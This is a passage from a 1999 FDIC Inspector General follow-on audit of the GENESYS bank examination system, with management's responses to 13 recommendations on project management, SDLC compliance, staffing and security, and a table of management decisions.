However, we recognize that evolutionary\nprototyping that extends beyond the requirements definition phase, similar to the methodology used\non GENESYS, may be useful on FDIC\'s small, non-complex systems initiatives that involve short\ndevelopment schedules.\n\nAny proposal to significantly deviate from the phased development approach prescribed by FDIC\'s\nSDLC process should include a formal written analysis of the risks and benefits associated with the\nalternative approach. In addition, proposals to significantly deviate from FDIC\'s SDLC process\nshould, at a minimum, be approved in writing by the Director, DIRM, and the program office\nDirector. Alternative development approaches should also be provided to the IT Council for review and\napproval. As with any development effort, alternative approaches should require the completion and\napproval of all critical SDLC deliverable products prescribed by FDIC\'s SDLC Manual.\n\nIn response to recommendation 9, the Directors, DIRM and DOS, stated that their divisions will\nbegin identifying and presenting any significant resources for non-FDIC GENESYS requirements to\nthe FDIC Board of Directors as part of the annual budget process. Any significant resources\nrequired for non-FDIC GENESYS requirements that are not approved as part of the annual budget\nprocess will also be presented to the FDIC Board of Directors for approval. In our opinion,\nsignificant cost deviations associated with non-FDIC requirements should be presented to the IT\nTechnical Committee for approval, just as significant cost deviations associated with FDIC\nrequirements must be approved by the IT Technical Committee.\n\n\nAPPENDIX I\n\nFDIC\nFederal Deposit Insurance Corporation\n3501 North Fairfax Drive. 
Arlington, VA 22226         Division of Information Resources Management\n\n\nMarch 15, 1999\n\nMEMORANDUM TO:                         David H. Loewenstein\n                                       Assistant Inspector General\n\n\n\nFROM:                                  Donald C. Demitros\n                                       Director, DIRM\n\n\n\n\n                                       James L. Sexton\n                                       Director, DOS\n\nSUBJECT:                               Response to Draft Report Entitled Follow-on Audit of the\n                                       General Examination System (GENESYS) Development Project\n\nThe Division of Information Resources Management (DIRM) and the Division of Supervision\n(DOS) appreciate the opportunity to formally respond to the recommendations contained in the\nsubject report. In general, the recommendations in this report focus on breakdowns in the project\nmanagement process and not on the quality of the product, with the exception of identified security\nweaknesses. In fact, the report states that \xe2\x80\x9cGENESYS would generally satisfy their [the DOS\nexaminers\xe2\x80\x99] requirements for generating a safety and soundness ROE.\xe2\x80\x9d DIRM recognizes the\nproblems in the project management process and, as previously stated in its response to the TAPS audit,\nhas strengthened existing processes and established new mechanisms to address this overall\nproblem. These include: more complete and robust IT plans for all projects; new management\nreporting; new guidelines for cost benefit analysis; post implementation reviews; and internal\ncontrols which tie to the steps in the SDLC.\n\nCurrently, each project that exceeds $200,000 has an IT Plan established at its inception along\nwith the appointment of a project owner from the requesting division or office. 
New information\nis now being captured in the IT Plan including early warning, overall project issues, budget\nissues, project justification, milestones, budget, and expenditures. This information is being used\nto produce a new management report highlighting budget variances, project slippage, and project\nrisks such as poor customer participation, project scope creep, technical challenges, staffing\nissues, contractor performance/management. Strict adherence is placed on cost and schedule.\nExpenditures for these projects are automatically updated via a direct tie to the DIRM budget\nsystem and requests to change completion dates for major project milestones require Branch\nChief approval or higher for key projects. In addition, during the annual budget formulation\nprocess, the funding and justification of the project is reviewed by the requesting division\xe2\x80\x99s line\nmanagement, the IT Technical Committee, and the IT Council. Procedures have been\nestablished to ensure that any significant changes in major projects are brought before the IT\nTechnical Committee for review and approval.\n\nNew procedures for conducting a cost benefit analysis, based on OMB and DOF guidelines, have\nbeen published and are being used on projects such as ETVS and CHRIS. These procedures will\nbe formally published with the next release of the Systems Development Life Cycle Manual\nSDLC. DIRM is now conducting post implementation reviews, which include a level of review\nto assess a project at the time of design, as well as looking at a project after its implementation.\n\nAlso, our new internal controls are now tied to the specific SDLC processes to ensure that we are\nadhering to our development methodology. 
Following approval of the new management control\nplan for systems development, a copy will be provided to the OIG.\n\nFor recommendations 1-4 DIRM will reemphasize specific requirements and responsibilities to\nall project managers by March 31, 1999. This will be accomplished through the issuance of a\nmemorandum from the Director of DIRM to all project managers clearly communicating the\npolicies referenced in this response. For recommendations 5-8, DIRM will review and\nstrengthen its SDLC, which it plans to revise by April 30, 1999, with later revisions as required.\nDIRM has previously complied with Recommendation 9, which entails obtaining Board of\nDirector approval for significant investments in non-FDIC GENESYS requirements. No\nadditional investments of this type are planned in 1999 or 2000. DOS has already started to\nestablish permanent core staff to manage major systems development efforts as suggested in\nrecommendations 10 and 11. Recommendations 12 and 13 entail the strengthening of\nGENESYS security, which is planned for future releases.\n\nDIRM and DOS believe that the above actions will address the overall recommendations included in\nthis report. The following outlines the corrective actions already taken or planned (including\nanticipated due dates) in response to each individual recommendation.\n\nRecommendation 1 (DIRM)\n\n       Formally evaluate and document the feasibility and cost-benefit of alternative solutions\n       for systems development projects, including major enhancements to GENESYS, using\n       the guidelines in the FDIC\'s SDLC Manual before committing significant life cycle\n       resources to a particular alternative.\n\nCorrective Action\n\n       The SDLC currently requires a project budget package, including a formal evaluation of\n       alternatives, be prepared for all corporate projects expected to exceed the IT Dollar\n       threshold. 
This threshold, currently set at $3 million, and a new formal CBA format now\n       exist but were not in place when GENESYS was initiated. These new guidelines and IT\n      dollar threshold, which are consistent with the DOF Directive on Cost Benefit Analysis\n      Methodology for the Purchase or Development of Capital Assets (Circular 4310.1), have\n      been used for recent projects, such as: the Structure Information Management System;\n      Electronic Travel Voucher Processing System (ETVPS); and other non-application\n      projects. Also, IT Plans are required for all projects exceeding $200,000 and, for any of\n      these projects that are new, a cost justification must be developed which includes the full\n      life cycle costs and benefits for the proposed alternative. These procedures and the IT\n      Dollar thresholds will be formally published with the next release of the SDLC, which\n      will clearly state the requirement for performing CBA\xe2\x80\x99s. DIRM, with the IT Committee,\n      will, by April 30, 1999, also review the current dollar threshold to determine whether it\n      warrants adjustment. As an interim measure, the new guidelines and IT dollar threshold\n      will be reemphasized and formally communicated to all project managers by March 31,\n      1999.\n\n      DIRM will reinforce its efforts to review project progress with clients, ensuring their\n      clear understanding and obtaining their approval of both original cost-benefit analyses,\n      and changes that modify the results of those analyses. DIRM also will present the initial\n      CBA and any updates for projects over $3 million to the IT Technical Committee. 
The IT\n      Technical Committee will report any project issues to the IT Council.\n\nRecommendation 2 (DIRM)\n\n      Revisit alternative solutions when significant scope, cost, risk, or schedule changes\n      occur on future information technology projects.\n\nCorrective Action\n\n      DIRM agrees that alternative solutions should be revisited when significant scope, cost,\n      risk, or schedule changes occur on information technology projects. Alternative solutions\n      will be revisited when CBAs are revised, which will occur when significant scope, cost,\n      risk, or schedule changes occur on projects over the $3 million threshold. Significant scope\n      and risk determinations will be made by management from DIRM and the sponsoring\n      FDIC division(s). Significant costs will be defined as projected over-runs of 20% or\n      more, and significant schedule slips will be defined as greater than 60 days. These\n      procedures and the IT Dollar thresholds will be formally published with the next release\n      of the SDLC, which will clearly state the requirement for performing CBA\xe2\x80\x99s. As an\n      interim measure, the new guidelines and IT dollar threshold will be reemphasized and\n      formally communicated to all project managers by March 31, 1999.\n\nRecommendation 3 (DIRM)\n\n      Revise the FDIC\'s SDLC Manual to require that as significant changes occur in a\n      project\'s scope, risk, estimated resources, or timeframes, that these changes be\n      approved by the IT Council.\n\nCorrective Action\n\n      Alerting senior management to significant deviations in cost-benefit information, timelines,\n      or increased risk is now required of all DIRM project managers. Corrective actions already\n      have been taken to ensure that such do not reoccur. 
IT plans, required for all projects\n      exceeding $200,000 in expenditures, have warning flags automatically set to alert senior\n      management when completion dates for major project milestones are slipping (Refer to\n      Attachment 2). These flags are reviewed monthly and project managers are required to\n      report to DIRM senior management to explain the issues and obstacles causing the warning\n      flags. Changes to schedules and projected cost expenditures are tightly controlled. A Branch\n      Chief must approve changes to schedules on all projects. The expenditures are automatically\n      updated, and therefore controlled via the budget system. These requirements will be\n      formally reemphasized and communicated to all project managers by March 31, 1999.\n\n      The IT Council provides the approval authority for the initiation of IT systems development\n      projects. It is the responsibility of project managers and, if appropriate, Steering\n      Committees, to ensure projects are reviewed and reevaluated at critical management\n      checkpoints during the life cycle of the systems development effort. In addition, schedule\n      slippage of more than 60 days or projected cost overruns of more than 20 percent for any\n      major project will be presented to the IT Technical Committee for management action. The\n      IT Committee will report these project issues to the IT Council. 
DIRM will arrange, by\n      March 31, 1999, for the OIG to meet with the IT Committee to discuss the OIG proposal to\n      change the charters of the IT Committee or IT Council to approve such deviations to project\n      schedules or costs.\n\nRecommendation 4 (DIRM)\n\n      Require the GENESYS development team to follow the phased development process\n      prescribed by the FDIC\'s SDLC Manual for systems development projects, including\n      any major enhancements to GENESYS.\n\nCorrective Action\n\n      All DIRM project managers are responsible for ensuring that prerequisite SDLC phases are\n      substantially complete and approved prior to proceeding with subsequent SDLC phases.\n      This process is in place but was not regularly adhered to during the initial GENESYS\n      systems development effort. Corrective actions have been taken to address these problems.\n      The current GENESYS version 1.2 project is being closely monitored by management to\n      ensure compliance with SDLC procedures.\n\n      The requirement to ensure that prerequisite SDLC phases are substantially complete and\n      approved prior to proceeding with subsequent SDLC phases will be highlighted in the next\n      SDLC revision. 
This requirement will be formally reemphasized and communicated to all\n      project managers by March 31, 1999.\n\n\n\n                                              31\n\x0c                                                                                     APPENDIX I\n\n      DIRM project managers may continue to propose different approaches to phased\n      development than dictated in the SDLC as justified by business needs and circumstances.\n      Any proposals to utilize significantly different approaches to phased development will be\n      considered on a case-by-case basis, and approved or denied in writing by senior DIRM\n      management after a review of the probable risks and benefits of the proposed approach.\n\nRecommendation 5 (DIRM)\n\n      Determine whether evolutionary prototyping could benefit FDIC\'s small, non-complex\n      systems initiatives that involve short development schedules. If DIRM determines that\n      evolutionary prototyping is appropriate for select, small scale IT initiatives, then the\n      FDIC\'s SDLC Manual should be amended to describe the type of methodology that will\n      be used and specific criteria governing its use.\n\nCorrective Action\n\n      The current FDIC SDLC methodology allows the use of prototyping in the Requirements\n      Definition Phase to elicit customer feedback on screen layouts and basic system features.\n      The prototype is developed and reviewed in an iterative process that continues until the\n      customer is satisfied with the basic features and screen designs, which are then documented\n      in the Functional Requirements Document. 
This prototyping methodology is often described\n      as throwaway prototyping.\n\n      The GENESYS project made extensive use of this technique during the Requirements\n      Definition Phase, building a prototype, however, that was not thrown away, but retained and\n      ultimately adopted as the starting point for development of the fully featured and completely\n      functional final system. As modules of GENESYS were completed in the Development\n      Phase, screens and functionality were reviewed with examiners to confirm that the\n      requirements and design had been effectively translated into working software. Often\n      changes were requested by the examiners and then incorporated into the software. This\n      iterative process, which lasted throughout the development phase and into the testing phase,\n      can be viewed as a form of evolutionary prototyping.\n\n      DIRM will make an assessment of whether the evolutionary prototyping methodology could\n      benefit FDIC\'s small, non-complex systems initiatives that involve short development\n      schedules. If DIRM determines that evolutionary prototyping is appropriate for select, small\n      scale IT initiatives, then the FDIC\'s SDLC Manual will be amended to describe the type of\n      methodology that will be used and specific criteria governing its use. The initial assessment\n      of the evolutionary prototyping methodology will be completed by June 30, 1999. A\n      schedule for updating the SDLC Manual will be developed after the assessment is complete,\n      but no later than July 30, 1999.\n\n\n\n\n                                               32\n\x0c                                                                                         APPENDIX I\n\n      DIRM continues to retain the latitude to incorporate additional systems development\n      practices into projects as required to supplement its standard SDLC methodology. 
If\n      significant variations or supplements to the SDLC are contemplated for a project, the project\n      managers are required to include them in their Project Work Plan deliverable, which is\n      subject to management review and approval. Techniques such as Joint Application Design\n      and Staged Delivery have been effectively incorporated into projects even though they are\n      not explicitly referenced in the SDLC. DIRM believes that the ability to continue to utilize\n      common software development methods in selected projects is a productive management\n      practice.\n\nRecommendation 6 (DIRM)\n\n      Follow the phased testing approach prescribed by the FDIC\'s SDLC Manual for all\n      future systems development projects and enhancements to existing systems.\n\nCorrective Action\n\n      DIRM agrees that a phased approach to comprehensive system testing, including unit and\n      integration testing, system qualification testing and user acceptance testing, should and will\n      be followed for all major system development and enhancement efforts, as prescribed by the\n      SDLC. Pilot testing may be included or not, for a given project, based on the judgement of\n      the project team and the desires, goals and objectives of the sponsoring agencies\xe2\x80\x99\n      management.\n\n      All development and enhancement projects will conduct appropriate testing, including unit\n      and integration testing, system qualification testing and user acceptance testing, per the\n      SDLC. 
Also per the SDLC, the project and program managers will exercise judgement in\n      determining the length, intensity, number and location of participants, and other relevant\n      testing factors for each test phase to conduct an overall testing activity that is appropriate in\n      scale and duration to the system or modification being tested.\n\nRecommendation 7 (DIRM/DOS)\n\n      Formally document and obtain interagency approval of the scope, tasks, schedule, and\n      resources associated with any major enhancement to GENESYS.\n\nCorrective Action\n\n      An interagency steering committee that will oversee development and enhancement of\n      interagency bank examination tools, including GENESYS, has been formed. This\n      committee includes management representatives from the FDIC, the Federal Reserve System\n      and the Conference of State Bank Supervisors, which represents the state regulators. This\n      committee provides high level direction for and oversight of the development and\n      enhancement of interagency bank examination tools. 
All such development or enhancement\n\n\n\n                                                 33\n\x0c                                                                                       APPENDIX I\n\n      cycles will begin with a planning phase, to include a detailed interagency project plan as a\n      deliverable; this project plan will include cycle scope, tasks, schedule and resource estimates,\n      and will be presented to the members of this committee for formal approval.\n\nRecommendation 8 (DIRM/DOS)\n\n      Obtain formal, interagency approval of all SDLC deliverable products required by the\n      FDIC\'s SDLC process for major planned GENESYS enhancements.\n\nCorrective Action\n\n      As indicated in the response to Recommendation 7 above, an interagency steering committee\n      has been formed to oversee development and enhancement of interagency bank examination\n      tools, including GENESYS. All SDLC deliverable products required for any major\n      GENESYS enhancement will require formal approval from this interagency committee.\n\nRecommendation 9 (DIRM/DOS)\n\n      Obtain FDIC Board of Director approval prior to investing significant FDIC resources\n      to satisfy non-FDIC requirements on GENESYS.\n\nCorrective Action\n\n      The FDIC Board of Directors did approve a total of $7.3 million dollars for the development\n      and support of GENESYS and related examination software through the year 2000 as part of\n      a July 1997 Board Case to acquire contractor services for DOS information systems projects.\n      Included within this Board Case was a GENESYS Project Work Plan, which noted that as a\n      result of interagency discussion, FDIC would \xe2\x80\x9cassume the role of the primary development\n      agency, with the participation of FDIC, FRS, and CSBS supervisory staff as needed.\xe2\x80\x9d\n\n      DIRM annually presents a comprehensive budget request to the FDIC Board of Directors for\n      approval. 
Any significant resources required for non-FDIC GENESYS requirements,\n      beyond what has already been approved, will be explicitly identified and presented to the\n      Board of Directors for approval via the annual budget request for the year in which these\n      expenses are expected to be realized. Any significant resources required for non-FDIC\n      GENESYS requirements that were not approved via the annual budget request would also be\n      presented to the Board of Directors for approval.\n\n\n\n\n                                                34\n\x0c                                                                                        APPENDIX I\n\nRecommendation 10 (DOS)\n\n      Evaluate the feasibility of establishing a permanent staff to manage the development,\n      operation, and maintenance of major DOS systems including GENESYS.\n\nCorrective Action\n\n      DOS recognizes the need for a more permanent staff to oversee software development.\n      However, to ensure the software satisfies the needs of the field staff, it is necessary that field\n      staff be used as subject matter experts to oversee product development. Examination\n      standards and policies are constantly changing and permanent Washington staff soon lose the\n      knowledge necessary to be effective in examination software development. In an effort to\n      provide continuity to project management, DOS Washington Policy Section established an\n      Examination Specialist position to head software development; however, additional staffing\n      will continue to be provided by field staff on detail assignments. For current GENESYS\n      development, DOS has recruited three field examiners for one year details who will report\n      directly to the Program Manager. Additional staffing will be provided from short-term\n      details as needed. 
The Federal Reserve Board has also provided permanent staffing for\n      developmental needs.\n\nRecommendation 11 (DOS)\n\n      Ensure that a core group of staff is assigned to future systems development or\n      enhancement projects until the project is completed.\n\nCorrective Action\n\n      A problem that DOS faces regarding permanent staffing is recruiting field examiners to\n      volunteer for extended assignments. We agree it is difficult to maintain continuity for\n      application development when the subject matter experts are replaced every 120 days.\n      However, if the detail assignment extends beyond 120 days, the detailee must change\n      travel status to Category II as required by the General Travel Regulations. Examiners are\n      reluctant to volunteer for these extended details because of personal and financial\n      drawbacks of such assignments. Not only do the extended detail assignments to\n      Washington take detailees away from families, but the loss of potential income can be\n      significant. Additionally, examiners believe that long-term details can hurt career\n      advancement opportunities because of lost examination experience while on the extended\n      detail. 
However, as indicated above, we believe the steps already taken will provide the\n      necessary continuity for the project going forward.\n\n\n\n\n                                                 35\n\x0c                                                                                         APPENDIX I\n\nRecommendation 12 (DIRM)\n\n      Incorporate security features into GENESYS that will adequately address the security\n      requirements contained in the functional requirements document and that will provide\n      reasonable assurance that confidential bank examination information will be\n      adequately protected against unauthorized disclosure or alteration.\n\nCorrective Action\n\n      DIRM is committed to strengthening the security features contained within GENESYS to\n      protect sensitive and confidential data contained in the system database. As explained in the\n      audit report, the measures that are currently in place are interim measures that afforded some\n      degree of protection while more robust and permanent measures could be identified and\n      incorporated.\n\n      The GENESYS project team sought and acquired a waiver of the corporate policy requiring\n      Entrust in order to release GENESYS as developed. One of the conditions of that waiver\n      was conversion from the interim security solution to a more permanent solution during the\n      version 1.2 enhancement cycle. DIRM has initiated this enhancement cycle, and discussions\n      are in progress with the Federal Reserve and the Conference of State Bank Supervisors to\n      identify a security solution that will be acceptable to all parties. 
Once identified, this solution\n      will be incorporated into the product for implementation with the v1.2 release of the system.\n\n\nRecommendation 13 (DIRM)\n\n      Direct DIRM\'s Information Security Section to perform a security review of\n      GENESYS to ensure compliance with corporate security standards and guidelines and\n      to ensure that the application has adequate security.\n\nCorrective Action\n\n      DIRM proposes to address this recommendation in conjunction with the version 1.2\n      enhancement cycle for the GENESYS product. A security review of the current product will\n      likely find the same weaknesses that have been identified in this audit report and would\n      therefore be of little value. As noted in DIRM\xe2\x80\x99s response to Recommendation 12, DIRM has\n      already initiated the v1.2 enhancement cycle for the GENESYS product, and this cycle will\n      include action to strengthen the security components of the GENESYS product. DIRM has\n      appointed an Information Security Section staff member to the project team, and will\n      conduct appropriate reviews and other actions to ensure that the v1.2 release of GENESYS is\n      in full compliance with corporate security standards. DIRM proposes to deliver the v1.2\n      release of GENESYS during the fourth quarter of 1999.\n\n\n\n\n                                                 36\n\x0c                                                                                                                                                                            APPENDIX II\n                                                               MANAGEMENT RESPONSES TO RECOMMENDATIONS\n\n\n\nThe Inspector General Act of 1978, as amended, requires the OIG to report the status of management decisions on its recommendations in its semiannual reports to the Congress. 
To consider FDIC's responses as management decisions in accordance with the act and related guidance, several conditions are necessary. First, the response must describe for each recommendation

- the specific corrective actions already taken, if applicable;
- corrective actions to be taken, together with the expected completion dates for their implementation; and
- documentation that will confirm completion of corrective actions.

If any recommendation identifies specific monetary benefits, FDIC management must state the amount agreed or disagreed with and the reasons for any disagreement. In the case of questioned costs, the amount FDIC plans to disallow must be included in management's response.

If management does not agree that a recommendation should be implemented, it must describe why the recommendation is not considered valid. Second, the OIG must determine that management's descriptions of (1) the course of action already taken or proposed and (2) the documentation confirming completion of corrective actions are responsive to its recommendations.

This table presents the management responses that have been made on recommendations in our report and the status of management decisions. The information for management decisions is based on management's written response to our report and subsequent discussions with management representatives. For each recommendation the table records the corrective action taken or planned and its status, the expected completion date, the documentation that will confirm final action, any monetary benefits, and whether a management decision has been reached (yes or no).

Rec. No. 1
Corrective action taken or planned/status: The Corporation agreed with the recommendation. The IT Technical Committee will review all 1999 IT development projects to determine which projects require a CBA by March 30, 1999. DIRM will issue a memorandum to its project managers re-emphasizing SDLC policy regarding CBAs.
Expected completion date: March 31, 1999
Documentation that will confirm final action: March 24, 1999 DIRM memorandum to OIG and DIRM memorandum to project managers.
Monetary benefits: None
Management decision: Yes

Rec. No. 2
Corrective action taken or planned/status: The Corporation agreed with the recommendation. DIRM will issue a memorandum to its project managers reminding them to alert senior management to significant changes in cost-benefit information, timelines, or increased risk. The DIRM memorandum will also communicate new policy requiring project managers to formally revisit alternative solutions when significant scope, cost, risk, or schedule changes occur on IT projects.
Expected completion date: March 31, 1999
Documentation that will confirm final action: DIRM memorandum to project managers.
Monetary benefits: None
Management decision: Yes

Rec. No. 3
Corrective action taken or planned/status: The Corporation agreed with the recommendation. DIRM will present significant scope, cost, risk, and schedule changes to the IT Technical Committee for approval. The IT Technical Committee will report this information to the IT Council. The IT Technical Committee will review any IT project that has been flagged with variances in DIRM's IT Plan Database. After reviewing these projects, the IT Technical Committee will request briefings from the DIRM project manager and client sponsor on projects considered significant. If the impact of the variance warrants, the IT Technical Committee will recommend IT Council review. Procedures for performing, updating, and maintaining CBAs will be formally published in the next release of FDIC's SDLC Manual.
Expected completion date: March 24, 1999
Documentation that will confirm final action: Revision to the IT Technical Committee Charter or documentation indicating that the IT Council is reviewing IT projects.
Monetary benefits: None
Management decision: Yes

Rec. No. 4
Corrective action taken or planned/status: The Corporation agreed with the recommendation. DIRM will issue a memorandum to all DIRM project managers re-emphasizing existing requirements that prerequisite SDLC phases be substantially completed and approved before proceeding with subsequent phases. This requirement will be highlighted in the upcoming SDLC revision, currently planned for April 30, 1999, with later revisions as required.
Expected completion date: March 31, 1999
Documentation that will confirm final action: DIRM memorandum to project managers.
Monetary benefits: None
Management decision: Yes

Rec. No. 5
Corrective action taken or planned/status: The Corporation agreed with the recommendation. DIRM will make an assessment as to whether deviations from FDIC's SDLC process, similar to the evolutionary prototyping methodology used to develop GENESYS, may benefit FDIC's small, non-complex systems initiatives that involve short development schedules. An initial assessment will be completed by June 30, 1999, with a schedule for updating FDIC's SDLC Manual to be developed no later than July 30, 1999.
Expected completion date: July 30, 1999
Documentation that will confirm final action: DIRM assessment document and specific changes to the SDLC Manual.
Monetary benefits: None
Management decision: Yes

Rec. No. 6
Corrective action taken or planned/status: The Corporation agreed with the recommendation. DIRM will issue a memorandum reminding its project managers to adhere to the phased testing approach prescribed by FDIC's SDLC Manual for all future systems development projects and enhancements.
Expected completion date: March 31, 1999
Documentation that will confirm final action: DIRM memorandum to project managers.
Monetary benefits: None
Management decision: Yes

Rec. No. 7
Corrective action taken or planned/status: The Corporation agreed with the recommendation. An interagency steering committee has been established to oversee the development and enhancement of interagency bank examination software, including GENESYS. The steering committee will formally approve an interagency project work plan describing life cycle scope, tasks, schedule, and resource estimates for any major GENESYS enhancement.
Expected completion date: October 6, 1998
Documentation that will confirm final action: DOS Regional Director Memorandum 98-097 and approved project work plan.
Monetary benefits: None
Management decision: Yes

Rec. No. 8
Corrective action taken or planned/status: The Corporation agreed with the recommendation. An interagency steering committee has been established to oversee the development and enhancement of interagency bank examination software, including GENESYS. The steering committee will formally approve all SDLC deliverable products required for any major GENESYS enhancement.
Expected completion date: October 6, 1998
Documentation that will confirm final action: DOS Regional Director Memorandum 98-097 and approved SDLC deliverable products.
Monetary benefits: None
Management decision: Yes

Rec. No. 9
Corrective action taken or planned/status: The Corporation agreed with the recommendation. DIRM and DOS will explicitly identify and present any significant resources for non-FDIC GENESYS requirements to the FDIC Board of Directors as part of the annual budget process. Any significant resources required for non-FDIC GENESYS requirements that were not approved as part of the annual budget process will also be presented to the FDIC Board of Directors for approval.
Expected completion date: March 15, 1999
Documentation that will confirm final action: DIRM and DOS budget documentation.
Monetary benefits: None
Management decision: Yes

Rec. No. 10
Corrective action taken or planned/status: The Corporation agreed with the recommendation. A permanent Examination Specialist position has been created to manage DOS' bank examination software development, including GENESYS. In addition, 3 field examiners have been appointed to support the development of DOS' bank examination software for a period of one year.
Expected completion date: January 4, 1999
Documentation that will confirm final action: Approved organization chart.
Monetary benefits: None
Management decision: Yes

Rec. No. 11
Corrective action taken or planned/status: The Corporation agreed with the recommendation. A permanent Examination Specialist position has been created to manage DOS' bank examination software development, including GENESYS. In addition, 3 field examiners have been appointed to support the development of DOS' bank examination software for a period of one year.
Expected completion date: January 4, 1999
Documentation that will confirm final action: Approved organizational chart.
Monetary benefits: None
Management decision: Yes

Rec. No. 12
Corrective action taken or planned/status: The Corporation agreed with the recommendation. Discussions are ongoing with representatives of the FRS and CSBS to identify a security solution for GENESYS. Once identified, the solution will be incorporated into the system with the implementation of GENESYS version 1.2.
Expected completion date: December 31, 1999
Documentation that will confirm final action: GENESYS system documentation.
Monetary benefits: None
Management decision: Yes

Rec. No. 13
Corrective action taken or planned/status: The Corporation agreed with the recommendation. DIRM appointed an Information Security Section staff member to the GENESYS project who will be responsible for conducting appropriate reviews to ensure that GENESYS version 1.2 is in full compliance with corporate security standards.
Expected completion date: December 31, 1999
Documentation that will confirm final action: Document from DIRM Information Security Section indicating that GENESYS complies with corporate security standards.
Monetary benefits: None
Management decision: Yes